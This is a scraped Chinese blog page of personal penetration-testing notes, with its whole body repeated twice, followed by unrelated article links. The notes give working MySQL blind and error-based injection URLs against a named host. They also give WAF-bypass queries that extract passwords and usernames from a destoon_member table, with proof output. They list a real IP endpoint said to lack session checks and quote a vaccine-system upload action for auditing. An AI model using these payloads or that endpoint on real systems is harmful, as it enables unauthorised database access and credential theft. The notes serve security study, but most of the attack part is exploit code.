20160315
来源:互联网 发布:高新技术软件产业园 编辑:程序博客网 时间:2024/06/05 19:18
mysql注入:
\ 反斜杠的奥秘
slecet from ,char,取代where 关键字绕过的奥秘
多次过滤的奥秘:2,3次注入;update更新管理员
jsp图片马:
在F盘百度网盘有下载
桌面也有文件夹有
Java && .Net代码审计知识回顾:
http://www.wooyun.org/bugs/wooyun-2014-053099 302跳转的大问题;小贺那个jsp并没有泄漏这些信息.
http://58.214.247.138:8888/vacc/document/downdoc.do?docu_id=2
downloaddocument没有SESSION
http://www.wooyun.org/bugs/wooyun-2010-061078
' or[字段名字]<db_name()-- //关键字的绕过
【.NET小科普之一】数据库信息在哪儿
http://drops.wooyun.org/tips/975
http://blog.163.com/hero_213/blog/static/3989121420085267561179/
mapping.findForward->struts-config获取标签fail.
HttpSession session = request.getSession();
String userid = (String)session.getAttribute("usersplatformuserid");
String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312");
if ((name == null) || ("".equals(name))) {
return mapping.findForward("fail");
}
nopted++;文件查找;整个目录查找class xxx
或者:public ServiceResponse
private ServiceResponse
public class ServiceResponse
搜索upload
这是upload的
import com.jwx.jfa.dto.ServiceRequest;
import com.jwx.jfa.dto.ServiceResponse;
import com.jwx.jfa.dto.ServiceResponse.ServiceCode;
import com.jwx.jfa.web.BaseAction;
import com.jwx.nipm.vaccine.dto.DocumentDTO;
import com.jwx.nipm.vaccine.util.VaccineIdentity;
import java.io.File;
import java.io.FileOutputStream;
import java.util.Iterator;
import java.util.List;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.commons.fileupload.DiskFileUpload;
import org.apache.commons.fileupload.FileItem;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
这是download的
import com.jwx.jfa.dto.ServiceRequest;
import com.jwx.jfa.dto.ServiceResponse;
import com.jwx.jfa.dto.ServiceResponse.ServiceCode;
import com.jwx.jfa.log.JfaLogger;
import com.jwx.jfa.web.BaseAction;
import com.jwx.nipm.vaccine.dto.DocumentDTO;
import com.jwx.nipm.vaccine.util.DateUtil;
import com.jwx.nipm.vaccine.util.VaccineIdentity;
import java.io.File;
import java.io.FileInputStream;
import java.util.Map;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.logging.Log;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
Linux环境upload
package com.jwx.nipm.vaccine.web.document;
import com.jwx.jfa.dto.ServiceRequest;
import com.jwx.jfa.dto.ServiceResponse;
import com.jwx.jfa.dto.ServiceResponse.ServiceCode;
import com.jwx.jfa.web.BaseAction;
import com.jwx.nipm.vaccine.dto.DocumentDTO;
import com.jwx.nipm.vaccine.util.VaccineIdentity;
import java.io.File;
import java.io.FileOutputStream;
import java.util.Iterator;
import java.util.List;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.commons.fileupload.DiskFileUpload;
import org.apache.commons.fileupload.FileItem;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
public class UploadDocumentAction extends BaseAction
{
public ActionForward execute(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
throws Exception
{
try
{
ServiceRequest serviceRequest = generateRequest(request);
serviceRequest.setIdentity(new VaccineIdentity());
serviceRequest.setRequestedCommandID("documentCommand");
serviceRequest.setParameter("action", "upload"); //action=upload 这样?
HttpSession session = request.getSession();
String userid = (String)session.getAttribute("usersplatformuserid"); //获取session usersplatformuserid的值
String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312"); //获取name的值
if ((name == null) || ("".equals(name))) {
return mapping.findForward("fail");
}
String fileStore = "document\\";
File store = new File(fileStore);
if (!store.exists()) store.mkdir();
DiskFileUpload fu = new DiskFileUpload();
fu.setSizeThreshold(1073741824);
List fileItems = fu.parseRequest(request); //解析你request过来的值
Iterator it = fileItems.iterator();
String fileName = null;
long fileSize = 0L;
byte[] content = null;
while (it.hasNext()) {
FileItem fi = (FileItem)it.next();
String field;
if (fi.isFormField()) {
field = fi.getFieldName().toUpperCase(); //把你的文件名全部大写
}
else {
fileName = fi.getName(); //获取文件名
fileSize = fi.getSize(); //获取文件大小
if (fileSize > 1048576L)
return mapping.findForward("fail");
content = fi.get();
}
}
if ((fileName == null) || (fileName.trim().equals(""))) throw new Exception("No file be selected!");
fileName = fileName.substring(fileName.lastIndexOf('\\'));
FileOutputStream os = new FileOutputStream(fileStore + File.separator + fileName, false); //File.separator 在 UNIX 系统上,此字段的值为
'/';在 Microsoft Windows 系统上,它为 '\'。
os.write(content);
os.close();
DocumentDTO document = new DocumentDTO();
document.setDocu_adder(Integer.valueOf(userid));
document.setDocu_title(fileName.substring(fileName.lastIndexOf('\\') + 1));
document.setDocu_size(Integer.toString((int)Math.floor((fileSize + 1023L) / 1024L)));
serviceRequest.setCurrentRequestObject(document);
ServiceResponse serviceResponse = processRequest(serviceRequest);
if (serviceResponse.getServiceCode() == ServiceResponse.ServiceCode.SUCCESS) {
return mapping.findForward("success");
}
return mapping.findForward("fail");
}
catch (Exception e)
{
e.printStackTrace();
}return mapping.findForward("fail");
}
}
mysql语法:
select-1;
select+1;
select{x 1};
select.`1`.a;
select.``.schema_name from information_schema.schemata;
http://rile.gou.gg/search?query=1%27>(select.``.schema_name from (select.``.schema_name,if(ascii(mid((select * from test.flag),1,1))
=102,(benchmark(5000000,sha(1))),1) from information_schema.schemata)x)%23
http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,0)%23
http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,1)%23
select * from corp where corp_id in (1,2,(if(1=1,3,2))) group by concat(version(),floor(rand(0)*2)) having min(0);
于是我们可以使用corp_id=1 and corp_name= 'xxxx'的形式最后获取corp_name的值
按道理类似的使用uname = ‘admin’ and upass = 'xxx'的方式获取pass的值
但是这里得靠字典将pass的字段爆破出来
http://zone.wooyun.org/content/23796
multipart/form-data PHP和Java通用的WAF绕过方法
http://zone.wooyun.org/content/24143
/*select*/SELECT`password`from `destoon_member`
/*select*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1
GROUP BY + HAVING 是可以帮助我们定位的。
### 字符猜解的绕过技巧
程序中过滤了很多猜解字符串需要的函数例如:substring/substr/left...但是好像忘记了right和mid?
code 区域
sql = mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 )
找到字符以后,需要对字符串进行转换。这方面,程序对ascii、hex、ord、char进行了过滤,但是CONV呢?
code 区域
CONV(mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 ),16,10)=16
技巧一:select.``.password from destoon_member
技巧二:select!1,password from destoon_member
mysql> SELECT LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1));
SELECT MID('username',3,1);
+---------------------------------------------------------------+
| LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1)) |
+---------------------------------------------------------------+
| e |
+---------------------------------------------------------------+
1 row in set
+---------------------+
| MID('username',3,1) |
+---------------------+
| e |
+---------------------+
1 row in set
mysql>
拆分字符串之后,我们试着把字符串转为10进制。conv与括号之间加入注释符,依然是可以使用的。
code 区域
mysql> select conv/**/('ad',16,10);
+----------------------+
| conv/**/('ad',16,10) |
+----------------------+
| 173 |
+----------------------+
1 row in set
## 漏洞利用代码
猜解destoon_member里的username。
code 区域
(/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid
limit 1)=(SELECT 0,13)
这个是转换后的代码,依然可以执行:
code 区域
(/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY
userid limit 1)=(SELECT!1,223)
漏洞证明:
我们提交的原语句为
code 区域
(/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid
limit 1)=(SELECT!1,223)
过滤后的语句为
code 区域
(/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY
userid limit 1)=(SELECT!1,223)
以下为测试SQL语句的可执行性
code 区域
mysql> select (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from
`destoon_member` ORDER BY userid limit 1)=(SELECT!1,223);
+----------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------+
| (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from
`destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) |
+----------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------+
|
0 |
+----------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------+
1 row in set
mysql> select (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from
`destoon_member` ORDER BY userid limit 1)=(SELECT!1,13);
+----------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------+
| (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from
`destoon_member` ORDER BY userid limit 1)=(SELECT!1,13) |
+----------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------+
|
1 |
+----------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------+
1 row in set
\ 反斜杠的奥秘
slecet from ,char,取代where 关键字绕过的奥秘
多次过滤的奥秘:2,3次注入;update更新管理员
jsp图片马:
在F盘百度网盘有下载
桌面也有文件夹有
Java && .Net代码审计知识回顾:
http://www.wooyun.org/bugs/wooyun-2014-053099 302跳转的大问题;小贺那个jsp并没有泄漏这些信息.
http://58.214.247.138:8888/vacc/document/downdoc.do?docu_id=2
downloaddocument没有SESSION
http://www.wooyun.org/bugs/wooyun-2010-061078
' or[字段名字]<db_name()-- //关键字的绕过
【.NET小科普之一】数据库信息在哪儿
http://drops.wooyun.org/tips/975
http://blog.163.com/hero_213/blog/static/3989121420085267561179/
mapping.findForward->struts-config获取标签fail.
HttpSession session = request.getSession();
String userid = (String)session.getAttribute("usersplatformuserid");
String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312");
if ((name == null) || ("".equals(name))) {
return mapping.findForward("fail");
}
nopted++;文件查找;整个目录查找class xxx
或者:public ServiceResponse
private ServiceResponse
public class ServiceResponse
搜索upload
这是upload的
import com.jwx.jfa.dto.ServiceRequest;
import com.jwx.jfa.dto.ServiceResponse;
import com.jwx.jfa.dto.ServiceResponse.ServiceCode;
import com.jwx.jfa.web.BaseAction;
import com.jwx.nipm.vaccine.dto.DocumentDTO;
import com.jwx.nipm.vaccine.util.VaccineIdentity;
import java.io.File;
import java.io.FileOutputStream;
import java.util.Iterator;
import java.util.List;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.commons.fileupload.DiskFileUpload;
import org.apache.commons.fileupload.FileItem;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
这是download的
import com.jwx.jfa.dto.ServiceRequest;
import com.jwx.jfa.dto.ServiceResponse;
import com.jwx.jfa.dto.ServiceResponse.ServiceCode;
import com.jwx.jfa.log.JfaLogger;
import com.jwx.jfa.web.BaseAction;
import com.jwx.nipm.vaccine.dto.DocumentDTO;
import com.jwx.nipm.vaccine.util.DateUtil;
import com.jwx.nipm.vaccine.util.VaccineIdentity;
import java.io.File;
import java.io.FileInputStream;
import java.util.Map;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.logging.Log;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
Linux环境upload
package com.jwx.nipm.vaccine.web.document;
import com.jwx.jfa.dto.ServiceRequest;
import com.jwx.jfa.dto.ServiceResponse;
import com.jwx.jfa.dto.ServiceResponse.ServiceCode;
import com.jwx.jfa.web.BaseAction;
import com.jwx.nipm.vaccine.dto.DocumentDTO;
import com.jwx.nipm.vaccine.util.VaccineIdentity;
import java.io.File;
import java.io.FileOutputStream;
import java.util.Iterator;
import java.util.List;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.commons.fileupload.DiskFileUpload;
import org.apache.commons.fileupload.FileItem;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
public class UploadDocumentAction extends BaseAction
{
public ActionForward execute(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
throws Exception
{
try
{
ServiceRequest serviceRequest = generateRequest(request);
serviceRequest.setIdentity(new VaccineIdentity());
serviceRequest.setRequestedCommandID("documentCommand");
serviceRequest.setParameter("action", "upload"); //action=upload 这样?
HttpSession session = request.getSession();
String userid = (String)session.getAttribute("usersplatformuserid"); //获取session usersplatformuserid的值
String name = new String(request.getParameter("name").getBytes("iso-8859-1"), "gb2312"); //获取name的值
if ((name == null) || ("".equals(name))) {
return mapping.findForward("fail");
}
String fileStore = "document\\";
File store = new File(fileStore);
if (!store.exists()) store.mkdir();
DiskFileUpload fu = new DiskFileUpload();
fu.setSizeThreshold(1073741824);
List fileItems = fu.parseRequest(request); //解析你request过来的值
Iterator it = fileItems.iterator();
String fileName = null;
long fileSize = 0L;
byte[] content = null;
while (it.hasNext()) {
FileItem fi = (FileItem)it.next();
String field;
if (fi.isFormField()) {
field = fi.getFieldName().toUpperCase(); //把你的文件名全部大写
}
else {
fileName = fi.getName(); //获取文件名
fileSize = fi.getSize(); //获取文件大小
if (fileSize > 1048576L)
return mapping.findForward("fail");
content = fi.get();
}
}
if ((fileName == null) || (fileName.trim().equals(""))) throw new Exception("No file be selected!");
fileName = fileName.substring(fileName.lastIndexOf('\\'));
FileOutputStream os = new FileOutputStream(fileStore + File.separator + fileName, false); //File.separator 在 UNIX 系统上,此字段的值为
'/';在 Microsoft Windows 系统上,它为 '\'。
os.write(content);
os.close();
DocumentDTO document = new DocumentDTO();
document.setDocu_adder(Integer.valueOf(userid));
document.setDocu_title(fileName.substring(fileName.lastIndexOf('\\') + 1));
document.setDocu_size(Integer.toString((int)Math.floor((fileSize + 1023L) / 1024L)));
serviceRequest.setCurrentRequestObject(document);
ServiceResponse serviceResponse = processRequest(serviceRequest);
if (serviceResponse.getServiceCode() == ServiceResponse.ServiceCode.SUCCESS) {
return mapping.findForward("success");
}
return mapping.findForward("fail");
}
catch (Exception e)
{
e.printStackTrace();
}return mapping.findForward("fail");
}
}
mysql语法:
select-1;
select+1;
select{x 1};
select.`1`.a;
select.``.schema_name from information_schema.schemata;
http://rile.gou.gg/search?query=1%27>(select.``.schema_name from (select.``.schema_name,if(ascii(mid((select * from test.flag),1,1))
=102,(benchmark(5000000,sha(1))),1) from information_schema.schemata)x)%23
http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,0)%23
http://rile.gou.gg/search?query=1' || if(ascii(substr((/*!select*/ */*a!*/from test.flag),1,1))=97,1,1)%23
select * from corp where corp_id in (1,2,(if(1=1,3,2))) group by concat(version(),floor(rand(0)*2)) having min(0);
于是我们可以使用corp_id=1 and corp_name= 'xxxx'的形式最后获取corp_name的值
按道理类似的使用uname = ‘admin’ and upass = 'xxx'的方式获取pass的值
但是这里得靠字典将pass的字段爆破出来
http://zone.wooyun.org/content/23796
multipart/form-data PHP和Java通用的WAF绕过方法
http://zone.wooyun.org/content/24143
/*select*/SELECT`password`from `destoon_member`
/*select*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1
GROUP BY + HAVING 是可以帮助我们定位的。
### 字符猜解的绕过技巧
程序中过滤了很多猜解字符串需要的函数例如:substring/substr/left...但是好像忘记了right和mid?
code 区域
sql = mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 )
找到字符以后,需要对字符串进行转换。这方面,程序对ascii、hex、ord、char进行了过滤,但是CONV呢?
code 区域
CONV(mid( (/*selec*/SELECT`password`from `destoon_member` GROUP BY userid HAVING userid = 1) , 1, 1 ),16,10)=16
技巧一:select.``.password from destoon_member
技巧二:select!1,password from destoon_member
mysql> SELECT LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1));
SELECT MID('username',3,1);
+---------------------------------------------------------------+
| LPAD(REVERSE(TRIM( lpad('username',3,SPACE(1)) )),1,SPACE(1)) |
+---------------------------------------------------------------+
| e |
+---------------------------------------------------------------+
1 row in set
+---------------------+
| MID('username',3,1) |
+---------------------+
| e |
+---------------------+
1 row in set
mysql>
拆分字符串之后,我们试着把字符串转为10进制。conv与括号之间加入注释符,依然是可以使用的。
code 区域
mysql> select conv/**/('ad',16,10);
+----------------------+
| conv/**/('ad',16,10) |
+----------------------+
| 173 |
+----------------------+
1 row in set
## 漏洞利用代码
猜解destoon_member里的username。
code 区域
(/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid
limit 1)=(SELECT 0,13)
这个是转换后的代码,依然可以执行:
code 区域
(/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY
userid limit 1)=(SELECT!1,223)
漏洞证明:
我们提交的原语句为
code 区域
(/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY userid
limit 1)=(SELECT!1,223)
过滤后的语句为
code 区域
(/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from `destoon_member` ORDER BY
userid limit 1)=(SELECT!1,223)
以下为测试SQL语句的可执行性
code 区域
mysql> select (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from
`destoon_member` ORDER BY userid limit 1)=(SELECT!1,223);
+----------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------+
| (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from
`destoon_member` ORDER BY userid limit 1)=(SELECT!1,223) |
+----------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------+
|
0 |
+----------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------+
1 row in set
mysql> select (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from
`destoon_member` ORDER BY userid limit 1)=(SELECT!1,13);
+----------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------+
| (/*select*/SELECT!1,conv/**/(LPAD(REVERSE(TRIM( lpad(username,1,SPACE(1)) )),1,SPACE(1)),16,10)/*from*/from
`destoon_member` ORDER BY userid limit 1)=(SELECT!1,13) |
+----------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------+
|
1 |
+----------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------+
1 row in set
0 0
- 20160315
- 日经春秋 20160315
- 20160315-对象和类
- 20160315-02-Activity 生命周期
- 天声人語 20160315 民進党、立憲も忘れずに
- 20160315 LightOJ 1236 Pairs Forming(素因子分解)
- 20160315写在消费者权益保护日的第一篇博客
- 20160315 Sail Studio 2244 剪格子,2324 N^3,2230 K好数
- 捕龙项目版本迭代说明(20160304、20160307、20160315)
- 20160315 第2章 在窗口中绘图(来自《MFC Windows 程序设计(第2版)》)
- c#中的is和as运算符
- Android新增API之AudioEffect中文API与应用实例
- PC和移动端的CSS重置样式表
- Linux下iptables端口转发实现跳转访问数据库应用场景:假设有A、B、C三台设备,A<
- 在Java中按字节获得字符串长度的两种方法
- 20160315
- cookie扫盲
- 解决android studio Error:SSL peer shut down incorrectly
- 【CI学习笔记】简单的session实例--添加与读取session
- 使用XMLHttpRequest 实现http 终止请求和超时
- K近邻算法
- android自定义控件
- Java经典设计模式之七大结构型模式
- CentOS No package nginx available.
